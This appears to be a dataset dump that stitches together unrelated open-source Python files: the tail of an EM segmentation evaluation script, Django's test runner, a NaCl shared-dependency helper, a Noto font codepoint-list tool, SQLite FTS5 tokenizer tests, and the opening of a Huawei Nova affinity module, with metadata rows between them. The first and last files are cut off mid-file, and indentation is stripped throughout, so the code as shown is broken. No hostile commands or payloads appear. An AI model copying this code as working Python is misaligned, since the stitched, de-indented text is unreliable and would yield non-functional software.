# changed to now use the already found selectedPixels, rather than applying upper and lower bounds
Y_hat = evaluate_network(nn, X, pp_func_curried, selectedPixels, lowerPixels, upperPixels, outDir=args.outDir)
# generate performance metrics, if applicable
if args.labelsFileName is not None:
Y = load_tiff_data(args.labelsFileName)
assert(numpy.all(numpy.logical_or(Y==0, Y==255)))
# remap values to 1=membrane, 0=non-membrane
Y[Y==0] = 1; Y[Y==255] = 0;
for ii in range(Y_hat.shape[0]):
print '[em_evaluate]: performance for slice %d:' % ii
eval_performance(Y[ii,:,:], Y_hat[ii,:,:], .5, verbose=True)
| apache-2.0 | -4,521,729,864,298,892,300 | 45.134021 | 165 | 0.597542 | false |
cafecivet/django_girls_tutorial | Lib/site-packages/django/test/runner.py | 6 | 11523 | from importlib import import_module
import os
from optparse import make_option
import unittest
from unittest import TestSuite, defaultTestLoader
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.test import SimpleTestCase, TestCase
from django.test.utils import setup_test_environment, teardown_test_environment
class DiscoverRunner(object):
"""
A Django test runner that uses unittest2 test discovery.
"""
test_suite = TestSuite
test_runner = unittest.TextTestRunner
test_loader = defaultTestLoader
reorder_by = (TestCase, SimpleTestCase)
option_list = (
make_option('-t', '--top-level-directory',
action='store', dest='top_level', default=None,
help='Top level of project for unittest discovery.'),
make_option('-p', '--pattern', action='store', dest='pattern',
default="test*.py",
help='The test matching pattern. Defaults to test*.py.'),
)
def __init__(self, pattern=None, top_level=None,
verbosity=1, interactive=True, failfast=False,
**kwargs):
self.pattern = pattern
self.top_level = top_level
self.verbosity = verbosity
self.interactive = interactive
self.failfast = failfast
def setup_test_environment(self, **kwargs):
setup_test_environment()
settings.DEBUG = False
unittest.installHandler()
def build_suite(self, test_labels=None, extra_tests=None, **kwargs):
suite = self.test_suite()
test_labels = test_labels or ['.']
extra_tests = extra_tests or []
discover_kwargs = {}
if self.pattern is not None:
discover_kwargs['pattern'] = self.pattern
if self.top_level is not None:
discover_kwargs['top_level_dir'] = self.top_level
for label in test_labels:
kwargs = discover_kwargs.copy()
tests = None
label_as_path = os.path.abspath(label)
# if a module, or "module.ClassName[.method_name]", just run those
if not os.path.exists(label_as_path):
tests = self.test_loader.loadTestsFromName(label)
elif os.path.isdir(label_as_path) and not self.top_level:
# Try to be a bit smarter than unittest about finding the
# default top-level for a given directory path, to avoid
# breaking relative imports. (Unittest's default is to set
# top-level equal to the path, which means relative imports
# will result in "Attempted relative import in non-package.").
# We'd be happy to skip this and require dotted module paths
# (which don't cause this problem) instead of file paths (which
# do), but in the case of a directory in the cwd, which would
# be equally valid if considered as a top-level module or as a
# directory path, unittest unfortunately prefers the latter.
top_level = label_as_path
while True:
init_py = os.path.join(top_level, '__init__.py')
if os.path.exists(init_py):
try_next = os.path.dirname(top_level)
if try_next == top_level:
# __init__.py all the way down? give up.
break
top_level = try_next
continue
break
kwargs['top_level_dir'] = top_level
if not (tests and tests.countTestCases()) and is_discoverable(label):
# Try discovery if path is a package or directory
tests = self.test_loader.discover(start_dir=label, **kwargs)
# Make unittest forget the top-level dir it calculated from this
# run, to support running tests from two different top-levels.
self.test_loader._top_level_dir = None
suite.addTests(tests)
for test in extra_tests:
suite.addTest(test)
return reorder_suite(suite, self.reorder_by)
def setup_databases(self, **kwargs):
return setup_databases(self.verbosity, self.interactive, **kwargs)
def run_suite(self, suite, **kwargs):
return self.test_runner(
verbosity=self.verbosity,
failfast=self.failfast,
).run(suite)
def teardown_databases(self, old_config, **kwargs):
"""
Destroys all the non-mirror databases.
"""
old_names, mirrors = old_config
for connection, old_name, destroy in old_names:
if destroy:
connection.creation.destroy_test_db(old_name, self.verbosity)
def teardown_test_environment(self, **kwargs):
unittest.removeHandler()
teardown_test_environment()
def suite_result(self, suite, result, **kwargs):
return len(result.failures) + len(result.errors)
def run_tests(self, test_labels, extra_tests=None, **kwargs):
"""
Run the unit tests for all the test labels in the provided list.
Test labels should be dotted Python paths to test modules, test
classes, or test methods.
A list of 'extra' tests may also be provided; these tests
will be added to the test suite.
Returns the number of tests that failed.
"""
self.setup_test_environment()
suite = self.build_suite(test_labels, extra_tests)
old_config = self.setup_databases()
result = self.run_suite(suite)
self.teardown_databases(old_config)
self.teardown_test_environment()
return self.suite_result(suite, result)
def is_discoverable(label):
"""
Check if a test label points to a python package or file directory.
Relative labels like "." and ".." are seen as directories.
"""
try:
mod = import_module(label)
except (ImportError, TypeError):
pass
else:
return hasattr(mod, '__path__')
return os.path.isdir(os.path.abspath(label))
def dependency_ordered(test_databases, dependencies):
"""
Reorder test_databases into an order that honors the dependencies
described in TEST[DEPENDENCIES].
"""
ordered_test_databases = []
resolved_databases = set()
    # Maps db signature to dependencies of all its aliases
dependencies_map = {}
# sanity check - no DB can depend on its own alias
for sig, (_, aliases) in test_databases:
all_deps = set()
for alias in aliases:
all_deps.update(dependencies.get(alias, []))
if not all_deps.isdisjoint(aliases):
raise ImproperlyConfigured(
"Circular dependency: databases %r depend on each other, "
"but are aliases." % aliases)
dependencies_map[sig] = all_deps
while test_databases:
changed = False
deferred = []
        # Try to find a DB that has all its dependencies met
for signature, (db_name, aliases) in test_databases:
if dependencies_map[signature].issubset(resolved_databases):
resolved_databases.update(aliases)
ordered_test_databases.append((signature, (db_name, aliases)))
changed = True
else:
deferred.append((signature, (db_name, aliases)))
if not changed:
raise ImproperlyConfigured(
"Circular dependency in TEST[DEPENDENCIES]")
test_databases = deferred
return ordered_test_databases
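# Illustrative sketch (aliases are hypothetical, not part of Django): given
#   test_databases = [(sig_a, ('db_a', {'default'})), (sig_b, ('db_b', {'other'}))]
#   dependencies   = {'other': ['default']}
# dependency_ordered() places the 'default' entry before the 'other' entry, so
# setup_databases() creates each test database after the ones it depends on.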
def reorder_suite(suite, classes):
"""
Reorders a test suite by test type.
`classes` is a sequence of types
All tests of type classes[0] are placed first, then tests of type
classes[1], etc. Tests with no match in classes are placed last.
"""
class_count = len(classes)
suite_class = type(suite)
bins = [suite_class() for i in range(class_count + 1)]
partition_suite(suite, classes, bins)
for i in range(class_count):
bins[0].addTests(bins[i + 1])
return bins[0]
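# Rough example: with classes=(TestCase, SimpleTestCase), a suite holding a
# SimpleTestCase test, a TestCase test and a plain unittest.TestCase test is
# reordered so the TestCase test comes first, then the SimpleTestCase test,
# and finally the plain unittest test (no match in classes, so it ends up in
# the last bin).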
def partition_suite(suite, classes, bins):
"""
Partitions a test suite by test type.
classes is a sequence of types
bins is a sequence of TestSuites, one more than classes
Tests of type classes[i] are added to bins[i],
    tests with no match found in classes are placed in bins[-1]
"""
suite_class = type(suite)
for test in suite:
if isinstance(test, suite_class):
partition_suite(test, classes, bins)
else:
for i in range(len(classes)):
if isinstance(test, classes[i]):
bins[i].addTest(test)
break
else:
bins[-1].addTest(test)
def setup_databases(verbosity, interactive, **kwargs):
from django.db import connections, DEFAULT_DB_ALIAS
# First pass -- work out which databases actually need to be created,
# and which ones are test mirrors or duplicate entries in DATABASES
mirrored_aliases = {}
test_databases = {}
dependencies = {}
default_sig = connections[DEFAULT_DB_ALIAS].creation.test_db_signature()
for alias in connections:
connection = connections[alias]
test_settings = connection.settings_dict['TEST']
if test_settings['MIRROR']:
# If the database is marked as a test mirror, save
# the alias.
mirrored_aliases[alias] = test_settings['MIRROR']
else:
# Store a tuple with DB parameters that uniquely identify it.
# If we have two aliases with the same values for that tuple,
# we only need to create the test database once.
item = test_databases.setdefault(
connection.creation.test_db_signature(),
(connection.settings_dict['NAME'], set())
)
item[1].add(alias)
if 'DEPENDENCIES' in test_settings:
dependencies[alias] = test_settings['DEPENDENCIES']
else:
if alias != DEFAULT_DB_ALIAS and connection.creation.test_db_signature() != default_sig:
dependencies[alias] = test_settings.get('DEPENDENCIES', [DEFAULT_DB_ALIAS])
# Second pass -- actually create the databases.
old_names = []
mirrors = []
for signature, (db_name, aliases) in dependency_ordered(
test_databases.items(), dependencies):
test_db_name = None
# Actually create the database for the first connection
for alias in aliases:
connection = connections[alias]
if test_db_name is None:
test_db_name = connection.creation.create_test_db(
verbosity,
autoclobber=not interactive,
serialize=connection.settings_dict.get("TEST_SERIALIZE", True),
)
destroy = True
else:
connection.settings_dict['NAME'] = test_db_name
destroy = False
old_names.append((connection, db_name, destroy))
for alias, mirror_alias in mirrored_aliases.items():
mirrors.append((alias, connections[alias].settings_dict['NAME']))
connections[alias].settings_dict['NAME'] = (
connections[mirror_alias].settings_dict['NAME'])
return old_names, mirrors
| gpl-2.0 | 1,334,041,034,199,654,000 | 35.932692 | 104 | 0.601059 | false |
chromium/chromium | native_client_sdk/src/tools/lib/get_shared_deps.py | 4 | 6932 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper script to close over all transitive dependencies of a given .nexe
executable.
e.g. Given
A -> B
B -> C
B -> D
C -> E
where "A -> B" means A depends on B, then GetNeeded(A) will return A, B, C, D
and E.
"""
import os
import re
import subprocess
import elf
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
SDK_DIR = os.path.dirname(os.path.dirname(SCRIPT_DIR))
NeededMatcher = re.compile('^ *NEEDED *([^ ]+)\n$')
FormatMatcher = re.compile('^(.+):\\s*file format (.+)\n$')
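# These patterns match lines of `objdump -p` output such as (illustrative
# snippet; exact column spacing differs between objdump builds):
#   /path/to/libfoo.so:     file format elf64-x86-64-nacl
#     NEEDED               libpthread.so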
LOADER_X86 = 'runnable-ld.so' # Name of the dynamic loader
LOADER_ARM = 'elf_loader_arm.nexe' # Name of the ARM dynamic loader
OBJDUMP_ARCH_MAP = {
# Names returned by Linux's objdump:
'elf64-x86-64': 'x86-64',
'elf32-i386': 'x86-32',
'elf32-little': 'arm',
'elf32-littlearm': 'arm',
# Names returned by old x86_64-nacl-objdump:
'elf64-nacl': 'x86-64',
'elf32-nacl': 'x86-32',
# Names returned by new x86_64-nacl-objdump:
'elf64-x86-64-nacl': 'x86-64',
'elf32-x86-64-nacl': 'x86-64',
'elf32-i386-nacl': 'x86-32',
'elf32-littlearm-nacl': 'arm',
}
# The proper name of the dynamic linker, as kept in the IRT. This is
# excluded from the nmf file by convention.
LD_NACL_MAP = {
'x86-32': 'ld-nacl-x86-32.so.1',
'x86-64': 'ld-nacl-x86-64.so.1',
'arm': None,
}
class Error(Exception):
'''Local Error class for this file.'''
pass
class NoObjdumpError(Error):
'''Error raised when objdump is needed but not found'''
pass
def GetNeeded(main_files, objdump, lib_path):
'''Collect the list of dependencies for the main_files
Args:
main_files: A list of files to find dependencies of.
objdump: Path to the objdump executable.
lib_path: A list of paths to search for shared libraries.
Returns:
A dict with key=filename and value=architecture. The architecture will be
    one of ('x86-32', 'x86-64', 'arm').
'''
dynamic = any(elf.ParseElfHeader(f)[1] for f in main_files)
if dynamic:
return _GetNeededDynamic(main_files, objdump, lib_path)
else:
return _GetNeededStatic(main_files)
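# Example call (paths and toolchain layout below are hypothetical):
#   libs = GetNeeded(['hello_world.nexe'],
#                    objdump='x86_64-nacl-objdump',
#                    lib_path=['/nacl_sdk/toolchain/linux_x86_glibc/x86_64-nacl/lib64'])
#   # -> {'hello_world.nexe': 'x86-64', '.../runnable-ld.so': 'x86-64', ...}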
def _GetNeededDynamic(main_files, objdump, lib_path):
examined = set()
all_files, unexamined = GleanFromObjdump(main_files, None, objdump, lib_path)
for arch in all_files.values():
if unexamined:
if arch == 'arm':
unexamined.add((LOADER_ARM, arch))
else:
unexamined.add((LOADER_X86, arch))
while unexamined:
files_to_examine = {}
# Take all the currently unexamined files and group them
# by architecture.
for name, arch in unexamined:
files_to_examine.setdefault(arch, []).append(name)
# Call GleanFromObjdump() for each architecture.
needed = set()
for arch, files in files_to_examine.items():
new_files, new_needed = GleanFromObjdump(files, arch, objdump, lib_path)
all_files.update(new_files)
needed |= new_needed
examined |= unexamined
unexamined = needed - examined
# With the runnable-ld.so scheme we have today, the proper name of
# the dynamic linker should be excluded from the list of files.
ldso = [LD_NACL_MAP[arch] for arch in set(OBJDUMP_ARCH_MAP.values())]
for filename, arch in list(all_files.items()):
name = os.path.basename(filename)
if name in ldso:
del all_files[filename]
return all_files
def GleanFromObjdump(files, arch, objdump, lib_path):
'''Get architecture and dependency information for given files
Args:
files: A list of files to examine.
[ '/path/to/my.nexe',
'/path/to/lib64/libmy.so',
'/path/to/mydata.so',
'/path/to/my.data' ]
arch: The architecure we are looking for, or None to accept any
architecture.
objdump: Path to the objdump executable.
lib_path: A list of paths to search for shared libraries.
Returns: A tuple with the following members:
input_info: A dict with key=filename and value=architecture. The
      architecture will be one of ('x86-32', 'x86-64', 'arm').
needed: A set of strings formatted as "arch/name". Example:
set(['x86-32/libc.so', 'x86-64/libgcc.so'])
'''
if not objdump:
raise NoObjdumpError('No objdump executable found!')
full_paths = set()
for filename in files:
if os.path.exists(filename):
full_paths.add(filename)
else:
for path in _FindLibsInPath(filename, lib_path):
full_paths.add(path)
cmd = [objdump, '-p'] + list(sorted(full_paths))
env = {'LANG': 'en_US.UTF-8'}
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=-1,
universal_newlines=True,
env=env)
input_info = {}
found_basenames = set()
needed = set()
output, err_output = proc.communicate()
if proc.returncode:
raise Error('%s\nStdError=%s\nobjdump failed with error code: %d' %
(output, err_output, proc.returncode))
file_arch = None
for line in output.splitlines(True):
# Objdump should display the architecture first and then the dependencies
# second for each file in the list.
matched = FormatMatcher.match(line)
if matched:
filename = matched.group(1)
file_arch = OBJDUMP_ARCH_MAP[matched.group(2)]
if arch and file_arch != arch:
continue
name = os.path.basename(filename)
found_basenames.add(name)
input_info[filename] = file_arch
matched = NeededMatcher.match(line)
if matched:
if arch and file_arch != arch:
continue
filename = matched.group(1)
new_needed = (filename, file_arch)
needed.add(new_needed)
for filename in files:
if os.path.basename(filename) not in found_basenames:
raise Error('Library not found [%s]: %s' % (arch, filename))
return input_info, needed
def _FindLibsInPath(name, lib_path):
'''Finds the set of libraries matching |name| within lib_path
Args:
name: name of library to find
lib_path: A list of paths to search for shared libraries.
Returns:
A list of system paths that match the given name within the lib_path'''
files = []
for dirname in lib_path:
# The libc.so files in the the glibc toolchain is actually a linker
# script which references libc.so.<SHA1>. This means the libc.so itself
# does not end up in the NEEDED section for glibc.
if name == 'libc.so':
continue
filename = os.path.join(dirname, name)
if os.path.exists(filename):
files.append(filename)
if not files:
raise Error('cannot find library %s' % name)
return files
def _GetNeededStatic(main_files):
needed = {}
for filename in main_files:
arch = elf.ParseElfHeader(filename)[0]
needed[filename] = arch
return needed
| bsd-3-clause | -5,328,695,073,726,777,000 | 29.008658 | 79 | 0.655366 | false |
dougfelt/nototools | nototools/gen_cplist.py | 2 | 3608 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Generate lists of codepoints prefixed with 'u' or 'uni' from a cmap data file.
Occasionally the designers want data in this format to create lists of files
for their tools, so let's just save this script.
"""
import argparse
from os import path
import sys
from nototools import cmap_data
from nototools import tool_utils
def glyphstr(cp):
return ('uni%04x' % cp) if cp < 0x10000 else ('u%05x' % cp)
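# For example, glyphstr(0x4e00) == 'uni4e00' while glyphstr(0x1f600) == 'u1f600':
# codepoints below U+10000 get the 'uni' prefix, supplementary ones get 'u'.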
def glyphstrs(cps):
return '\n'.join(glyphstr(cp) for cp in sorted(cps))
def write_cp_list(cps, fname):
with open(fname, 'w') as f:
f.write(glyphstrs(cps))
f.write('\n')
def generate_single(cmapdata, script, outfile):
for row in cmapdata.table.rows:
if script == row.script:
cps = tool_utils.parse_int_ranges(row.ranges)
write_cp_list(cps, outfile)
print >> sys.stderr, 'wrote %s to %s' % (script, outfile)
return
raise ValueError('no script "%s" in cmap data' % script)
def generate(cmapdata, dst_dir, scripts, namepats):
if not scripts:
raise ValueError('no scripts')
if not namepats:
raise ValueError('no namepats')
if len(scripts) != len(namepats):
if len(namepats) != 1:
raise ValueError(
'Have %d script%s but %d namepats' %
(len(scripts), '' if len(scripts) == 1 else 's', len(namepats)))
if '%s' not in namepats[0] and len(scripts) > 1:
raise ValueError(
'Have multiple scripts but single namepat "%s" has no substitution'
% namepats[0])
namepats = [namepats[0]] * len(scripts)
dst_dir = tool_utils.ensure_dir_exists(dst_dir)
for s, n in zip(scripts, namepats):
outfile = path.join(dst_dir, (n % s) if '%s' in n else n)
generate_single(cmapdata, s, outfile)
def main():
default_cmap = '[tools]/nototools/data/noto_cmap_phase3.xml'
default_namepats = ['cps_%s.txt']
epilog = """If a namepat contains the string "%s" then the script id will
be substituted for it. If one namepat is provided it is used for all scripts,
otherwise there should be as many namepats as there are scripts."""
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-c', '--cmap_file', help='cmap data file to use (default %s)' %
default_cmap, default=default_cmap, metavar='file')
parser.add_argument(
'-d', '--dest_dir', help='directory for output, (defaults to current '
'directory)', metavar='dir', default='.')
parser.add_argument(
'-s', '--scripts', help='script ids of data to output', nargs='+',
metavar='id', required=True)
parser.add_argument(
'-n', '--namepats', help='name patterns used to generate output '
'filenames (default "cps_%%s.txt")',
default=default_namepats, metavar='npat', nargs='+')
args = parser.parse_args()
cmap_filepath = tool_utils.resolve_path(args.cmap_file)
cmapdata = cmap_data.read_cmap_data_file(cmap_filepath)
generate(cmapdata, args.dest_dir, args.scripts, args.namepats)
if __name__ == '__main__':
main()
| apache-2.0 | 8,612,731,639,528,319,000 | 31.8 | 79 | 0.674612 | false |
hideaki-t/sqlite-fts-python | tests/test_fts5.py | 1 | 12135 | # coding: utf-8
from __future__ import print_function, unicode_literals
import sqlite3
import re
from collections import Counter
from sqlitefts import fts5, fts5_aux
import pytest
from cffi import FFI
ffi = FFI()
class SimpleTokenizer(fts5.FTS5Tokenizer):
_p = re.compile(r'\w+', re.UNICODE)
def tokenize(self, text, flags):
for m in self._p.finditer(text):
s, e = m.span()
t = text[s:e]
l = len(t.encode('utf-8'))
p = len(text[:s].encode('utf-8'))
yield t, p, p + l
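# Rough illustration of the tokenizer output: for text 'abc あい',
# SimpleTokenizer().tokenize(text, flags) yields ('abc', 0, 3) and ('あい', 4, 10);
# the offsets are byte positions into the UTF-8 encoding, not character indices.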
@pytest.fixture
def c():
c = sqlite3.connect(':memory:')
c.row_factory = sqlite3.Row
return c
@pytest.fixture
def tm():
return fts5.make_fts5_tokenizer(SimpleTokenizer())
def test_fts5_api_from_db(c):
fts5api = fts5.fts5_api_from_db(c)
assert fts5api.iVersion == 2
assert fts5api.xCreateTokenizer
c.close()
def test_make_tokenizer(c):
tm = fts5.make_fts5_tokenizer(SimpleTokenizer())
assert all(
getattr(tm, x) is not None
for x in ('xCreate', 'xDelete', 'xTokenize'))
c.close()
def test_make_tokenizer_by_class(c):
tm = fts5.make_fts5_tokenizer(SimpleTokenizer)
assert all(
getattr(tm, x) is not None
for x in ('xCreate', 'xDelete', 'xTokenize'))
c.close()
def test_register_tokenizer(c, tm):
name = 'super_simple'
assert fts5.register_tokenizer(c, name, tm)
c.close()
def test_register_tokenizer_with_destroy(c, tm):
name = 'super_simple'
arg_on_destroy = []
context = "hello"
def on_destroy(x):
arg_on_destroy.append(x)
assert fts5.register_tokenizer(
c, name, tm, context=context, on_destroy=on_destroy)
c.close()
assert arg_on_destroy == [context]
def test_createtable(c, tm):
name = 'super_simple'
sql = "CREATE VIRTUAL TABLE fts USING fts5(w, tokenize={})".format(name)
fts5.register_tokenizer(c, name, tm)
c.execute(sql)
r = c.execute(
"SELECT * FROM sqlite_master WHERE type='table' AND name='fts'").fetchone(
)
assert r
assert r[str('type')] == 'table' and r[str('name')] == 'fts' and r[str(
'tbl_name')] == 'fts'
assert r[str('sql')].upper() == sql.upper()
c.close()
def test_createtable_using_tokenizer_class(c):
initialized = {}
deleted = Counter()
class ST(SimpleTokenizer):
def __init__(self, context=None, args=None):
initialized[self] = (context, tuple(args))
def on_delete(self):
deleted[self] += 1
name = 'super_simple'
fts5.register_tokenizer(
c, name, fts5.make_fts5_tokenizer(ST), context='test')
sql = (
"CREATE VIRTUAL TABLE fts "
"USING FTS5(content, tokenize='{} {} {}')").format(name, 'arg', '引数')
c.execute(sql)
assert len(initialized) == 1
assert list(initialized.values()) == [('test', ('arg', '引数'))]
assert len(deleted) == 0
sql = (
"CREATE VIRTUAL TABLE fts_2 "
"USING FTS5(content, tokenize='{} {} {}')").format(name, 'arg2', '引数2')
c.execute(sql)
c.close()
assert set(initialized.values()) == {('test', ('arg', '引数')),
('test', ('arg2', '引数2'))}
assert list(x for x in deleted.values()) == [1, 1]
def test_insert(c, tm):
name = 'super_simple'
content = 'これは日本語で書かれています'
fts5.register_tokenizer(c, name, tm)
c.execute("CREATE VIRTUAL TABLE fts USING FTS5(content, tokenize={})".
format(name))
r = c.execute('INSERT INTO fts VALUES(?)', (content, ))
assert r.rowcount == 1
r = c.execute("SELECT * FROM fts").fetchone()
assert r
assert r[str('content')] == content
c.close()
def test_match(c, tm):
name = 'super_simple'
contents = [('abc def', ), ('abc xyz', ), ('あいうえお かきくけこ', ),
('あいうえお らりるれろ', )]
fts5.register_tokenizer(c, name, tm)
c.execute("CREATE VIRTUAL TABLE fts USING FTS5(content, tokenize={})".
format(name))
r = c.executemany('INSERT INTO fts VALUES(?)', contents)
assert r.rowcount == 4
r = c.execute("SELECT * FROM fts").fetchall()
assert len(r) == 4
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'abc'").fetchall()
assert len(r) == 2
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'def'").fetchall()
assert len(r) == 1 and r[0][str('content')] == contents[0][0]
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'xyz'").fetchall()
assert len(r) == 1 and r[0][str('content')] == contents[1][0]
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'zzz'").fetchall()
assert len(r) == 0
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'あいうえお'").fetchall()
assert len(r) == 2
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'かきくけこ'").fetchall()
assert len(r) == 1 and r[0][str('content')] == contents[2][0]
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'らりるれろ'").fetchall()
assert len(r) == 1 and r[0][str('content')] == contents[3][0]
r = c.execute("SELECT * FROM fts WHERE fts MATCH 'まみむめも'").fetchall()
assert len(r) == 0
c.close()
def test_full_text_index_queries(c, tm):
name = 'super_simple'
docs = [(
'README',
'sqlitefts-python provides binding for tokenizer of SQLite Full-Text search(FTS3/4). It allows you to write tokenizers in Python.'
), ('LICENSE',
'''Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:'''),
('日本語', 'あいうえお かきくけこ さしすせそ たちつてと なにぬねの')]
with c:
fts5.register_tokenizer(c, name, tm)
c.execute(
"CREATE VIRTUAL TABLE docs USING FTS5(title, body, tokenize={})".
format(name))
c.executemany("INSERT INTO docs(title, body) VALUES(?, ?)", docs)
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'Python'").fetchall(
)
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'bind'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'binding'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'to'").fetchall()
assert len(r) == 2
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'あいうえお'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'らりるれろ'").fetchall()
assert len(r) == 0
assert (c.execute(
"SELECT * FROM docs WHERE docs MATCH 'binding'").fetchall()[0] ==
c.execute("SELECT * FROM docs WHERE docs MATCH 'body:binding'")
.fetchall()[0])
assert (c.execute("SELECT * FROM docs WHERE docs MATCH 'body:binding'")
.fetchall()[0] ==
c.execute("SELECT * FROM docs WHERE docs MATCH 'body:binding'")
.fetchall()[0])
assert (c.execute(
"SELECT * FROM docs WHERE docs MATCH 'あいうえお'").fetchall()[0] ==
c.execute("SELECT * FROM docs WHERE docs MATCH 'body:あいうえお'")
.fetchall()[0])
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'title:bind'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'title:README'").fetchall()
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'title:日本語'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'to in'").fetchall()
assert len(r) == 2
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'Py*'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'Z*'").fetchall()
assert len(r) == 0
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'あ*'").fetchall()
assert len(r) == 1
r = c.execute("SELECT * FROM docs WHERE docs MATCH 'ん*'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'tokenizer SQLite'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH '\"tokenizer SQLite\"'").fetchall(
)
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'あいうえお たちつてと'").fetchall()
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH '\"あいうえお たちつてと\"'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'tok* + SQL*'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'tok* of SQL*'").fetchall()
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'あ* + さ*'").fetchall()
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'あ* かきくけこ さ*'").fetchall()
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(tokenizer SQLite)'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(binding SQLite, 2)'").fetchall(
)
assert len(r) == 0
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(binding SQLite, 3)'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(あいうえお たちつてと)'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(あいうえお たちつてと, 2)'").fetchall(
)
assert len(r) == 1
r = c.execute(
"SELECT * FROM docs WHERE docs MATCH 'NEAR(あいうえお たちつてと, 3)'").fetchall(
)
assert len(r) == 1
def test_flags(c):
flags_counter = Counter()
class ST(SimpleTokenizer):
def tokenize(self, text, flags):
flags_counter[flags] += 1
return super(ST, self).tokenize(text, flags)
name = 'super_simple2'
fts5.register_tokenizer(c, name, fts5.make_fts5_tokenizer(ST()))
sql = ("CREATE VIRTUAL TABLE fts "
"USING FTS5(content, tokenize='{}')").format(name)
c.execute(sql)
c.executemany('INSERT INTO fts VALUES(?)',
[('abc def', ), ('abc xyz', ), ('あいうえお かきくけこ', ),
('あいうえお らりるれろ', )])
c.execute("SELECT * FROM fts WHERE fts MATCH 'abc'").fetchall()
c.execute("SELECT * FROM fts WHERE fts MATCH 'abc'").fetchall()
c.close()
assert flags_counter[fts5.FTS5_TOKENIZE_DOCUMENT] == 4
assert flags_counter[fts5.FTS5_TOKENIZE_QUERY] == 2
def test_aux_and_tokenize(c, tm):
name = 'super_simple'
fts5.register_tokenizer(c, name, tm)
fts5_aux.register_aux_function(c, 'tokenize', fts5_aux.aux_tokenize)
c.execute("CREATE VIRTUAL TABLE fts USING FTS5(content, tokenize={})".
format(name))
r = c.executemany('INSERT INTO fts VALUES(?)',
(['hello world'], ['こんにちは 世界']))
assert r.rowcount == 2
r = c.execute('SELECT tokenize(fts, 0) FROM fts')
assert [x[0] for x in r.fetchall()] == ['hello, world', 'こんにちは, 世界']
c.close()
| mit | -4,572,678,191,763,336,700 | 35.26935 | 138 | 0.571148 | false |
nash-x/hws | nova/huawei/compute/affinity_api.py | 1 | 10643 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012-2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all requests relating to compute resources (e.g. guest VMs,
networking and storage of VMs, and compute hosts on which they run)."""
from nova.db import base
from nova import exception
from nova.huawei import exception as huawei_exception
from nova.compute import api as core_api
from nova.huawei.compute import rpcapi as affinity_rpcapi
from nova.huawei.objects import affinity_group as affinitygroup_obj
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class AffinityGroupAPI(base.Base):
